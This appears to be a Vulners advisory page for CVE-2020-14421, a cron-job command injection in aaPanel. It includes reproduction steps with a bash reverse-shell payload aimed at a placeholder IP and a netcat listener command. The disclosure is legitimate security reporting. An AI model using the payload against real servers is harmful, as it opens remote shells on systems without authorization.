| Reporter | Title | Published | Views | Family All 12 |
|---|---|---|---|---|
| Exploit for Argument Injection in Aapanel | 18 Jun 202011:04 | โ | githubexploit | |
| aaPanel Remote Code Execution Vulnerability | 19 Jun 202000:00 | โ | cnvd | |
| CVE-2020-14421 | 18 Jun 202012:51 | โ | cve | |
| CVE-2020-14421 | 18 Jun 202012:51 | โ | cvelist | |
| aaPanel 6.6.6 - Privilege Escalation & Remote Code Execution (Authenticated) | 16 Oct 202000:00 | โ | exploitdb | |
| EUVD-2020-6560 | 7 Oct 202500:30 | โ | euvd | |
| CVE-2020-14421 | 18 Jun 202013:15 | โ | nvd | |
| CVE-2020-14421 | 18 Jun 202013:15 | โ | osv | |
| aaPanel 6.6.6 Privilege Escalation | 16 Oct 202000:00 | โ | packetstorm | |
| Code injection | 18 Jun 202013:15 | โ | prion |
This is authenticated RCE.
Vulnerability Description
During my testing/evaluation of aaPanel, I identified a flaw in how cron
jobs are handled, which enables an attacker to inject and execute arbitrary
commands remotely. Specifically:
-
An authenticated user can manipulate cron job entries in a way that
breaks out of the software to the server.
-
This leads to the execution of malicious code on the server hosting
aaPanel, potentially compromising the entire system.
Steps to Reproduce
1.
Log in to the aaPanel dashboard
2.
Create a new cron job with the payload: bash -c "bash -i >& /dev/tcp/XXXX/1234 0>&1" (XXXX is your ip)
3.
Save the cron job and trigger it (or wait for the scheduled execution).
Start a listener on the other side to receive: nc -lvnp 1234
4.
Observe the execution of the injected command on the server and RCE.
Many thanks,
Alasdair Gorniak/Hamed KohiData
Build on a solid foundation withย Vulners data
Weย provide theย essential building blocks forย cybersecurity solutions withย comprehensive, structured, andย constantly updated vulnerability andย exploits data
Api
Power your application withย Vulners API
The Vulners REST API offers reliable, high-performance access toย vulnerabilityย intelligence, withย 99.9%ย SLAย uptime andย CDN-backed data delivery forย seamlessย global access
App
Assess and manage vulnerabilities withย Vulnersย tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation